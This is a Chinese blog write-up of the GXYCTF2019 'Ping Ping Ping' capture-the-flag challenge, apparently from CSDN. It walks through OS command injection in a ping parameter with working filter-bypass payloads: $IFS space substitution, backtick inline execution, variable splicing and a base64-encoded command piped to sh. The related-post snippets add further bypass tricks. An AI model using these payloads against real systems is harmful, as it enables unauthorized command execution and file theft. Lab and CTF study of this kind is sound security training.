命令执行及绕过

最新推荐文章于 2024-11-30 01:37:04 发布
原创 最新推荐文章于 2024-11-30 01:37:04 发布 · 410 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

文章详细介绍了在GXYCTF2019挑战中如何通过命令执行来绕过过滤,包括使用cat命令、内联执行、变量拼接和编码方法尝试获取flag.php和index.php的内容,展示了多种Linux命令和过滤绕过策略。

题目:[GXYCTF2019]Ping Ping Ping

这道题考察的是命令执行以及绕过的内容
![2023-06-27T07:05:06.png][1]

首先这个题目没给什么信息,仅有一个ip=,可以看出这是个命令执行的题目,通过构建/?ip=127.0.0.1|ls的payload抓包发现这个页面下含有两个文件’index.php’以及’flag.php’。

尝试利用cat去获在这里插入图片描述
取flag,发现存在空格的过滤
在这里插入图片描述

通过命令绕过空格的一般方法有

{cat,flag.txt}
cat $ {IFS}flag.txt
cat $ IFS $ 9flag.txt
cat $ IFS $ 1flag.txt
cat<flag.txt
%09替换
cat<>flag.txt
kg= $ ‘\x20flag.txt’&&cat$kg

这里利用cat$IFS$1flag.php试试,发现依旧存在问题
在这里插入图片描述

利用相同的方法去查询index.php文件,发现flag也被过滤了
在这里插入图片描述

一、内联绕过

在linux系统中,反引号是作为内联执行,输出查询结果的内容。比如用ls查询出index.php。那么`ls`就代表了index.php这个文件。于是可以考虑利用cat命令去获取该文件的内容

/?ip=127.0.0.1;cat$IFS$1`ls`

在这里插入图片描述

二、变量拼接

既然flag整个不能输入那就差分成两个部分,a=fl,b=ag

/?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b.php

在这里插入图片描述

好好好,你这么过滤是吧,再来,只设置b=ag看看

/?ip=127.0.0.1;b=ag;cat$IFS$9fl$b.php

在这里插入图片描述

三、编码

遇到过滤不要怕,我们可以通过编码去绕过,利用base64在线加密的方式去加密我们的payload,再通过base -d解密,后跟一个sh作为shell解释器

/?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

在这里插入图片描述

当然其他的方法如:f\l\a\g这种试过,发现也被过滤了
总结:命令行执行首先要灵活运用cat、ls、sh等命令去实现文件内容的查询,绕过需要掌握编码(最简单),变量拼接,内联法去绕过过滤的内容,同时需要记住绕过空格的方法!

【CTF】buuctf web(一)——命令执行
m0_52923241的博客
07-26 3474
[ACTF2020 新生赛]Exec 抓包看看 得到信息:以post方式通过变量target传参
web刷题记录(1)
2301_81841047的博客
05-29 1539
这道sql题,我是用sql-map做出来的,所以这里展示用sql-map的做法,老样子,进入发现有参数的传入口,传参以后,用bp抓包,将抓包内容的文件复制到kali里面,使用sql-map的命令进行检查,因为不确定是哪一种注入形式,所以这里采用五级三风险,发现是时间盲注和报错注入,而且爆出了一个库。这里我考虑了取反来进行绕过,但是发现没有回显。但是,直接构造payload发现,还是被拦截了,也不知道是什么被过滤了,再次查看,发现是flag文件的连接的“al”被过滤了,所以,这里再次使用转义符,进行绕过
2021-10-01
clearloveQAQ的博客
10-17 3130
命令执行: eval类 1.过滤flag: (1)用通配符绕过?c=system('cat f*'); (2)复制:system("cp fla*.php 1.txt") 执行文件:1.txt 2.过滤flag,php,system(对命令执行函数进行过滤) 命令执行函数 因为system被过滤这里可用反引号绕过 ?c=echo `cat f*`; ?c=eval($_GET[1]);&1=system('cat flag.php'); 3.过滤flag...
Flag】-PHP-正则绕过
soldi_er的博客
09-02 2663
文章目录【RCTF2020】calc通用字符集合正则字符替换[a-z]落脚函数参考 最近RCTF分站赛要开始了,梳理一些知识。 【RCTF2020】calc 主要check源码如下 $str = $_GET['num']; $blacklist = ['[a-z]', '[\x7f-\xff]', '\s',"'", '"', "`", '\[', "\]","\$", '_', "\\\\",'\^', ","]; foreach ($blacklist as $blackitem) {
命令执行绕过
人若无名,便可专心练剑
07-15 571
BUUCTF文件上传
精选资源
17.命令执行相关函数及各类命令执行绕过技巧讲解.pdf
01-25
### 命令执行相关函数及各类命令执行绕过技巧详解 #### 一、命令执行基础知识 **命令执行**是一种安全漏洞,攻击者通过利用应用程序的功能来执行恶意命令。这通常发生在应用程序允许用户输入数据时,该数据最终被...
CTF命令执行常用绕过方式
最新发布
晓梦林的博客
11-30 660
执行的返回结果,完整显示出来,结合前面的。这里&要经过url编码,进行绕过。将a 文件重命名为b。A执行失败后,执行B。
struts2绕过waf读写文件及另类方式执行命令1
08-03
首先,我们注意到标题提到的"struts2绕过waf读写文件及另类方式执行命令1",这表明我们将讨论Struts2框架中的一种或多种漏洞,这些漏洞可能导致攻击者能够绕过WAF的保护措施,执行命令或进行文件操作。 在描述中,...
漏洞扫描、命令执行绕过WAF
2401_83237906的博客
10-28 1125
一被封就换IP;但这玩意要付费;
CTF 命令执行绕过总结
jnszstmei的博客
06-01 1657
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示。或:rce-xor-or.php & rce-xor-or.py。# ls -t >shell 将输出输入到shell文件中。异或:rce-xor.php & rce-xor.py。%09(url传递)(cat%09flag.php)sh /flag 2>%261 //报错出文件内容。2、1使用空变量$*和$@,$x,${x}绕过。7、异或无符号(过滤0-9a-zA-Z)more:一页一页的显示档案内容。
【BUUCTF】Ping Ping Ping (命令执行绕过总结)
徐徐徐的博客
09-05 1683
{IFS}${IFS}$9 //这里$1到$9都可以$IFS$1 //这里$1到$9都可以{cat,flag.php} //用逗号实现了空格功能,需要用{}括起来%20 (space) //在shell中无法直接使用%20代替空格,但是在URL编码中可以尝试,tab同理%09 (tab)$X // \x09表示tab,也可以用\x20$X。
Linux系统下绕过某个关键字的小技巧,比如flag关键字
weixin_44632787的博客
07-24 2928
Linux系统下绕过某个关键字的小技巧,比如绕过flag关键字 首先先在linux系统下创建一个文件名为flag.txt的文件。里面的内容为:This is Flag! 这里提供几个绕过某个关键字的小技巧。 单引号绕过: cat fla’g’.txt 双引号绕过: cat fla"g".txt 反斜线绕过: cat f\lag.txt $+数字绕过: cat fl$1ag.txt,cat fl$2ag.txt,cat fl$3ag.txt $@绕过: cat fl$@ag.txt Base6
CTF之命令执行常见绕过
qq_42383069的博客
04-18 8296
在 linux 下表示分隔符,只有cat$IFSa.txt 的时候, bash 解释器会把整个 IFSa当做变量名,所以导致没有办法运行,然而如果加一个 {} 就固定了变量名,同理在后面加个 $ 可以起到截断的作用,而 $9 指的是当前系统shell 进程的第九个参数的持有者,就是一个空字符串,因此 $9 相当于没有加东西,等于做了一个前后隔离。]有一个重要的区别,当匹配的文件不存在,[…通过测试,可见程序过滤了截断符,根据以上的知识,我们来fuzz一下可用的截断符。根据burp爆破,发现可以通过。
命令执行
weixin_43940853的博客
08-19 249
http://198.13.45.199:5005/index.php https://blog.youkuaiyun.com/qq_26187985/article/details/89046386 注意对空格的取代是${IFS} (此题适用于命令执行的对一些字段过滤的题型) 一上来进行目录的ls ...
绕过之cat|/ flag
m0_61011147的博客
09-06 3168
绕过之cat|/ flag
Go - flag:命令行flags解析
Marionxue
10-06 1万+
Day Day GOflag作为go的基础模块,属于必知必会的常用模块,flag实现命令行flag解析,比如ls -l中的-l,当然golang内置的flag也可以实现类似docker ...
CTFWeb-命令执行漏洞过滤的绕过姿势
热门推荐
道阻且长,行则将至
04-29 2万+
文章目录前言CTF题目绕过姿势命令联合执行关键词的绕过内联执行绕过多种解法变量拼接内联执行Base64编码总结 前言 为了备战(划水)5 月份广东省的 “红帽杯” 网络安全竞赛,继续开始到 BUUCTF 平台练习 CTF 题目。在去年参加的第四届强网杯全国网络安全竞赛中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参赛WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过flag 关键字的过滤并读取了 flag 值: 本文目的在于结合 BU
命令执行各种姿势总结
weixin_48427966的博客
04-24 2268
一、绕过if(!eval($c);web30。
CTF中,命令中空格被过滤的解决方法
m0_46315342的博客
08-20 2603
转载于: 作者:HyyMbb 链接:https://blog.youkuaiyun.com/a3320315/article/details/99773192 来源:优快云博客
命令执行技术详解:函数与绕过策略
"该文档详细介绍了命令执行的相关函数和绕过技巧,主要涵盖命令注入与代码执行的区别,以及PHP中的system、exec、passthru等命令执行函数的使用方法,并探讨了命令执行绕过策略,如换行符的利用和后台进程的应用。...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

muzzert

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值